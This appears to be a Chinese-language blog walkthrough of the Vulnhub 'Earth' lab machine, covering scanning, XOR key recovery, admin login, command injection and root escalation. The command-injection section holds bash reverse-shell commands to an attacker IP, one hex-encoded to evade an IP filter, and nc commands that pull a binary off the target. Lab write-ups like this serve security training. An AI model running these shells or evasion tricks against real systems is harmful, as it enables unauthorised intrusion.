首页 > 其他分享 >Vulnhub 靶机 THE PLANETS: EARTH

Vulnhub 靶机 THE PLANETS: EARTH

时间:2024-10-07 21:25:46浏览次数:6  
标签:terratest http PLANETS Vulnhub https earth EARTH txt local

0x01信息收集

1.1、nmap扫描

IP段扫描,确定靶机地址

平扫描

nmap 192.168.1.0/24

扫描结果(部分)

Nmap scan report for earth.local (192.168.1.129)
Host is up (0.0015s latency).
Not shown: 983 filtered tcp ports (no-response), 14 filtered tcp ports (admin-prohibited)
PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http
443/tcp open  https
MAC Address: 00:0C:29:61:E4:BE (VMware)

或者全端口全脚本ip段扫描(慢)

nmap -A -p- -v 192.168.1.0/24

扫描结果

TRACEROUTE
HOP RTT     ADDRESS
1   2.57 ms 192.168.1.2

Nmap scan report for earth.local (192.168.1.129)
Host is up (0.0015s latency).
Not shown: 65369 filtered tcp ports (no-response), 163 filtered tcp ports (admin-prohibited)
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 8.6 (protocol 2.0)
| ssh-hostkey:
|   256 5b:2c:3f:dc:8b:76:e9:21:7b:d0:56:24:df:be:e9:a8 (ECDSA)
|_  256 b0:3c:72:3b:72:21:26:ce:3a:84:e8:41:ec:c8:f8:41 (ED25519)
80/tcp  open  http     Apache httpd 2.4.51 ((Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9)
| http-methods:
|_  Supported Methods: GET HEAD OPTIONS
|_http-title: Earth Secure Messaging
|_http-server-header: Apache/2.4.51 (Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9
443/tcp open  ssl/http Apache httpd 2.4.51 ((Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9)
|_http-server-header: Apache/2.4.51 (Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=earth.local/stateOrProvinceName=Space
| Subject Alternative Name: DNS:earth.local, DNS:terratest.earth.local
| Issuer: commonName=earth.local/stateOrProvinceName=Space
| Public Key type: rsa
| Public Key bits: 4096
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2021-10-12T23:26:31
| Not valid after:  2031-10-10T23:26:31
| MD5:   4efa:65d2:1a9e:0718:4b54:41da:3712:f187
|_SHA-1: 04db:5b29:a33f:8076:f16b:8a1b:581d:6988:db25:7651
| tls-alpn:
|_  http/1.1
|_http-title: Earth Secure Messaging
| http-methods:
|_  Supported Methods: GET HEAD OPTIONS
MAC Address: 00:0C:29:61:E4:BE (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|storage-misc
Running (JUST GUESSING): Linux 4.X|5.X|2.6.X|3.X (97%), Synology DiskStation Manager 5.X (90%), Netgear RAIDiator 4.X (87%)
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:linux:linux_kernel:2.6.32 cpe:/o:linux:linux_kernel:3 cpe:/a:synology:diskstation_manager:5.2 cpe:/o:netgear:raidiator:4.2.28
Aggressive OS guesses: Linux 4.15 - 5.8 (97%), Linux 5.0 - 5.4 (97%), Linux 5.0 - 5.5 (95%), Linux 5.4 (91%), Linux 2.6.32 (91%), Linux 3.10 - 4.11 (91%), Linux 3.2 - 4.9 (91%), Linux 3.4 - 3.10 (91%), Linux 2.6.32 - 3.10 (91%), Linux 2.6.32 - 3.13 (91%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 19.199 days (since Tue Sep 17 23:32:55 2024)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=257 (Good luck!)
IP ID Sequence Generation: All zeros

得到信息

IP:192.168.1.129
开放端口:22 ssh 80 http 443  ssl
及其服务版本号
1.1.1服务查看

22端口——ssh服务

80端口——http(尝试ip访问界面)

访问没有结果

443端口——ssl(尝试重新访问)

ip访问是Fedora Webserver Test Page页面,尝试使用域名访问

发现443端口有DNS解析 DNS:earth.local, DNS:terratest.earth.local,在hosts文件中添加DNS解析

192.168.1.129	earth.local
192.168.1.129	terratest.earth.local

1.2、网页信息收集

添加完成访问页面

http://earth.local/

发现Previous Messages:

0d4252435841450f50435d45191349424213180d4252435841451e0f
0d4252435841450f50435d45191349424213180d4252435841451e0f
37090b59030f11060b0a1b4e0000000000004312170a1b0b0e4107174f1a0b044e0a000202134e0a161d17040359061d43370f15030b10414e340e1c0a0f0b0b061d430e0059220f11124059261ae281ba124e14001c06411a110e00435542495f5e430a0715000306150b0b1c4e4b5242495f5e430c07150a1d4a410216010943e281b54e1c0101160606591b0143121a0b0a1a00094e1f1d010e412d180307050e1c17060f43150159210b144137161d054d41270d4f0710410010010b431507140a1d43001d5903010d064e18010a4307010c1d4e1708031c1c4e02124e1d0a0b13410f0a4f2b02131a11e281b61d43261c18010a43220f1716010d40
3714171e0b0a550a1859101d064b160a191a4b0908140d0e0d441c0d4b1611074318160814114b0a1d06170e1444010b0a0d441c104b150106104b1d011b100e59101d0205591314170e0b4a552a1f59071a16071d44130f041810550a05590555010a0d0c011609590d13430a171d170c0f0044160c1e150055011e100811430a59061417030d1117430910035506051611120b45
2402111b1a0705070a41000a431a000a0e0a0f04104601164d050f070c0f15540d1018000000000c0c06410f0901420e105c0d074d04181a01041c170d4f4c2c0c13000d430e0e1c0a0006410b420d074d55404645031b18040a03074d181104111b410f000a4c41335d1c1d040f4e070d04521201111f1d4d031d090f010e00471c07001647481a0b412b1217151a531b4304001e151b171a4441020e030741054418100c130b1745081c541c0b0949020211040d1b410f090142030153091b4d150153040714110b174c2c0c13000d441b410f13080d12145c0d0708410f1d014101011a050d0a084d540906090507090242150b141c1d08411e010a0d1b120d110d1d040e1a450c0e410f090407130b5601164d00001749411e151c061e454d0011170c0a080d470a1006055a010600124053360e1f1148040906010e130c00090d4e02130b05015a0b104d0800170c0213000d104c1d050000450f01070b47080318445c090308410f010c12171a48021f49080006091a48001d47514c50445601190108011d451817151a104c080a0e5a

继续访问

https://terratest.earth.local/

在扫描中我们发现有ssl服务在这里其实我们两个网址都可以用https

1.3、目录扫描

earth.local目录扫描:

dirb https://earth.local/

结果:

┌──(root㉿kali)-[/etc]
└─# dirb https://earth.local/

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Mon Oct  7 04:36:07 2024
URL_BASE: https://earth.local/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: https://earth.local/ ----
+ https://earth.local/admin (CODE:301|SIZE:0)
+ https://earth.local/cgi-bin/ (CODE:403|SIZE:199)

-----------------
END_TIME: Mon Oct  7 04:36:34 2024
DOWNLOADED: 4612 - FOUND: 2

发现可疑目录:admin

terratest.earth.local目录扫描

dirb https://terratest.earth.local/

结果:

┌──(root㉿kali)-[/etc]
└─# dirb https://terratest.earth.local/

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Mon Oct  7 04:38:50 2024
URL_BASE: https://terratest.earth.local/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: https://terratest.earth.local/ ----
+ https://terratest.earth.local/cgi-bin/ (CODE:403|SIZE:199)
+ https://terratest.earth.local/index.html (CODE:200|SIZE:26)
+ https://terratest.earth.local/robots.txt (CODE:200|SIZE:521)

-----------------
END_TIME: Mon Oct  7 04:39:01 2024
DOWNLOADED: 4612 - FOUND: 3

发现可疑文件:robots.txt

1.3.1、访问目录

分别对admin、robots.txt进行访问

admin:

发现登录界面

robots.txt

发现文件Disallow: /testingnotes.*但不知道格式,进行爆破得到为txt格式

测试安全消息系统注意事项:
*使用XOR加密作为算法,在RSA中使用应该是安全的。
*地球已确认他们已收到我们发送的信息。
*testdata.txt 用于测试加密。
*terra 用作管理门户的用户名。
去做:
*我们如何安全地将每月的密钥发送到地球? 或者我们应该每周更换钥匙?
*需要测试不同的密钥长度以防止暴力破解。 钥匙应该多长时间?
*需要改进消息界面和管理面板的界面,目前非常基础。

告诉我们加密算法是 XOR,并且有一个testdata.txt文档用于测试加密,用户名是terra,先访问testdata.txt并保存:

0x02漏洞攻击

1.1、XOR解密

写个简单py脚本,选一个Previous Messages数据,然后与 testdata.txt 进行一下 XOR 运算,得到密钥

脚本():

import binascii

data1 = "37090b59030f11060b0a1b4e0000000000004312170a1b0b0e4107174f1a0b044e0a000202134e0a161d17040359061d43370f15030b10414e340e1c0a0f0b0b061d430e0059220f11124059261ae281ba124e14001c06411a110e00435542495f5e430a0715000306150b0b1c4e4b5242495f5e430c07150a1d4a410216010943e281b54e1c0101160606591b0143121a0b0a1a00094e1f1d010e412d180307050e1c17060f43150159210b144137161d054d41270d4f0710410010010b431507140a1d43001d5903010d064e18010a4307010c1d4e1708031c1c4e02124e1d0a0b13410f0a4f2b02131a11e281b61d43261c18010a43220f1716010d40"
data2 = "3714171e0b0a550a1859101d064b160a191a4b0908140d0e0d441c0d4b1611074318160814114b0a1d06170e1444010b0a0d441c104b150106104b1d011b100e59101d0205591314170e0b4a552a1f59071a16071d44130f041810550a05590555010a0d0c011609590d13430a171d170c0f0044160c1e150055011e100811430a59061417030d1117430910035506051611120b45"
data3 = "2402111b1a0705070a41000a431a000a0e0a0f04104601164d050f070c0f15540d1018000000000c0c06410f0901420e105c0d074d04181a01041c170d4f4c2c0c13000d430e0e1c0a0006410b420d074d55404645031b18040a03074d181104111b410f000a4c41335d1c1d040f4e070d04521201111f1d4d031d090f010e00471c07001647481a0b412b1217151a531b4304001e151b171a4441020e030741054418100c130b1745081c541c0b0949020211040d1b410f090142030153091b4d150153040714110b174c2c0c13000d441b410f13080d12145c0d0708410f1d014101011a050d0a084d540906090507090242150b141c1d08411e010a0d1b120d110d1d040e1a450c0e410f090407130b5601164d00001749411e151c061e454d0011170c0a080d470a1006055a010600124053360e1f1148040906010e130c00090d4e02130b05015a0b104d0800170c0213000d104c1d050000450f01070b47080318445c090308410f010c12171a48021f49080006091a48001d47514c50445601190108011d451817151a104c080a0e5a"

d1 = binascii.b2a_hex(open('testdata.txt', 'rb').read()).decode()
d2 = binascii.b2a_hex(open('testdata.txt', 'rb').read()).decode()
d3 = binascii.b2a_hex(open('testdata.txt', 'rb').read()).decode()

print(hex(int(data1, 16) ^ int(d1, 16)))
print(hex(int(data2, 16) ^ int(d2, 16)))
print(hex(int(data3, 16) ^ int(d3, 16)))

得到结果

0x4163636f7264696e6720746f20726164696f6d657472696320646174696e6720657374696d6174696f6e20616e64206f746865722065766964656e63652c20456172746820666f726d6564206f76657220342e352062696c6c696f6e2079656172732061676f2e2057697468696e207468652066697273742062696c6c696f6e207965617273206f66204561727468277320686973436679202f2f7d6f6d6f3b2f70706561726527327e643b7f662427782c7f6a6a3d2a616c66332c6f717c79247736267c25516a76772b55203c40663b792f6a7f6b72307e683c506a31732e3d066997f3dc732d712c3c6a247b75676e247536267f2a2b6f2765726c6a7c6d6e6e2f3f3b2d277f31252c667b6b78382e607f6229228ce5996e70607573742a797a64317d7862693a6f7b297e73687d2c5e3623546a637937616a2c796e3e4868752d17736b6c2924496e2a27792f6479626a377074347e7522743d356a6768262379782a2b6677693d2f65617079726e63616e786b797f382f6b3c0b363d2b3180e8da712a497238786f22507c377766626e
0x4163636f7264696e6720746f20726164696f6d657472696320646174696e6720657374696d6174696f6e20616e64206f746865722065766964656e63652c20456172746820666f726d6564206f76657220342e352062696c6c696f6e2079656172732061676f2e2057697468696e207468652066697273742062696c6c696f6e207965617273206f66204561727468277320686973746f72792c206c69666520617070656172656420696e20746865206f6365616e7320616e6420626567616e20746f2061666665637420456172746827732061746d6f73706865726520616e6420737572666163652c206c656164696e6720746f207468652070726f6c5e72726c6a7e3c6576797f7b262a786b7c68246b61772d6f6320302d2777656231343669716324687465376166236065637e296f3e6b466e6b756b7a64747c613e797e63697976627e6a6e24364f3f30697e7f647c30767c246c78347e25356c33642a606d783661387b76636b65746469612025652c7b747239783e717b3177246826767e6f6178782d296966347476367075646b
0x6561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174

分别对其进行十六进制转文本解码:

得第三个解密:

earthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimat

根据前面猜测密码是:earthclimatechangebad4humans

1.2、登录后台

用户名:terra

密 码:earthclimatechangebad4humans

1.3、命令执行

看起来像是个命令执行接口,让我们小心使用

反弹一个shell看看

bash -c 'exec bash -i &>/dev/tcp/192.168.1.128/6666 <&1'

发现没有用,翻一下有啥吧

查找 flag相关文件

find / -name "*flag*"

发现第一个flag

Command output: [user_flag_3353b67d6437f07ba7d34afd7d2fc27d]

继续翻

看看ls /var/www/html/terratest.earth.local有啥没有可用的

最后在/var/earth_web/secure_message/forms.py发现了服务器段采用了正则对IP进行数字匹配

1.4、shell反弹

把ip地址转换为16进制试试反弹

bash -c 'exec bash -i &>/dev/tcp/0xc0.0xa8.0x01.0x80/6666 <&1'

发现反弹成功

1.5、提权

查找可用权限

发现一个reset_root 运行一下

发现用不了

把文件导出来看看

nc -nlvp 7777 >reset_root

nc 192.168.1.129 7777 < /usr/bin/reset_root

使用 strace 命令进行调试

发现没有权限,给权调试一下看看

strace ./reset_root

发现缺失了三个文件,在靶机里面也没有

write(1, "CHECKING IF RESET TRIGGERS PRESE"..., 38CHECKING IF RESET TRIGGERS PRESENT...
) = 38
access("/dev/shm/kHgTFI5G", F_OK)       = -1 ENOENT (No such file or directory)
access("/dev/shm/Zw7bV9U5", F_OK)       = -1 ENOENT (No such file or directory)
access("/tmp/kcM0Wewe", F_OK)           = -1 ENOENT (No such file or directory)
write(1, "RESET FAILED, ALL TRIGGERS ARE N"..., 44RESET FAILED, ALL TRIGGERS ARE NOT PRESENT.
) = 44
exit_group(0)                           = ?
+++ exited with 0 +++

在靶机里面创建三个文件之后运行reset_root

提权成功

查找flag

拿到flag

标签:terratest,http,PLANETS,Vulnhub,https,earth,EARTH,txt,local
From: https://www.cnblogs.com/yuell/p/18450628

相关文章

  • VulnHub2018_DeRPnStiNK靶机渗透练习
    据说该靶机有四个flag扫描扫描附近主机arp-scan-l扫主目录扫端口nmap-sS-sV-n-T4-p-192.168.xx.xx结果如下StartingNmap7.94SVN(https://nmap.org)at2024-09-3019:25CSTNmapscanreportfor192.168.93.131Hostisup(0.0024slatency).Notshown:......
  • vulnhub-Lampiao靶机的测试报告
    目录一、测试环境1、系统环境2、使用工具/软件二、测试目的三、操作过程1、信息搜集2、Getshell3、提权四、结论一、测试环境1、系统环境渗透机:kali2021.1(192.168.202.134)靶 机:Linuxlampiao4.4.0-31-generic#50~14.04.1-Ubuntu2、使用工具/软件Kali:arp......
  • vulnhub-EvilBox---One靶机的测试报告
    目录一、测试环境1、系统环境2、使用工具/软件二、测试目的三、操作过程1、信息搜集①主机探测②端口和服务探测③扫描目录2、进行渗透①渗透网页②渗透空白页③测试evil.php的文件包含3、Getshell①查看ssh是否支持私钥登录②获取私钥进行登录③John爆破ssh......
  • vulnhub入门靶场:basic_pentesting
    靶机下载链接:https://download.vulnhub.com/basicpentesting/basic_pentesting_1.ova一、环境安装双击下载好的.ova文件即可在VMware上打开网卡这里确保与kali使用同一网卡,处于同一网段二、信息收集先确定kali的ip:192.168.231.133扫描一下靶机的ip:192.168.231.196ar......
  • VulnHub-SickOs1.1靶机笔记
    SickOs1.1靶机笔记概述Vulnhub的靶机sickos1.1主要练习从互联网上搜索信息的能力,还考察了对代理使用,目录爆破的能力,很不错的靶机靶机地址:链接:https://pan.baidu.com/s/1JOTvKbfT-IpcgypcxaCEyQ?pwd=ytad提取码:ytad一、nmap扫描1)主机发现sudonmap-sn192.168.111.0/......
  • vulnhub-Basic Pentesting 2靶机
    vulnhub:https://www.vulnhub.com/entry/basic-pentesting-2,241/导入靶机(建议VirtualBox,VMWare扫不到),放在kali同网段,扫描靶机在192.168.81.3,扫描端口很多端口,存在网站服务,访问啥也没有查看8080端口是Tomcat的页面,也没啥东西尝试从ssh服务突破,枚举用户enum4li......
  • Vulnhub靶机:Depth: 1
    0x01项目地址Depth:10x02靶机描述Manytimeswhileconductingapentest,Ineedtoscriptsomethinguptomakemylifeeasierortoquicklytestanattackideaorvector.RecentlyIcameacrossaninterestingcommandinjectionvectoronawebapplicatio......
  • Vulnhub靶机:The Ether: EvilScience
    0x01项目地址TheEther:EvilScience(v1.0.1)0x02靶机描述ThegoalistofindoutwhatTheEtherisupto.Youwillberequiredtobreakintotheirserver,rootthemachine,andretrievetheflag.目标是找出TheEther的意图。你需要侵入他们的服务器,获取ro......
  • Google Earth Pro(谷歌地球)安装教程
    软件:GoogleEarthPro7.3.6语言:简体中文大小:55M安装环境:Win7及以上操作系统下载夸克网盘丨下载链接:夸克网盘分享1.把资源从网盘下载到电脑上面,右键压缩包选择解压到当前文件夹。2.打开解压后的文件夹,鼠标右击【Setup】选择【以管理员身份运行】。3.取消勾选【在安装后......
  • [vulnhub] LAMPSecurity: CTF4
    https://www.vulnhub.com/entry/lampsecurity-ctf4,83/端口扫描主机发现探测存活主机,138是靶机nmap-sP192.168.75.0/24//StartingNmap7.93(https://nmap.org)at2024-09-2314:13CSTNmapscanreportfor192.168.75.1H......

赞助商

阅读排行

网站主页关于我们联系我们网站地图

本网站内容转载自其他媒体,侵权联系[admin##ips99.com]。

Copyright © 2020-2023 IPS99 版权所有 IPS99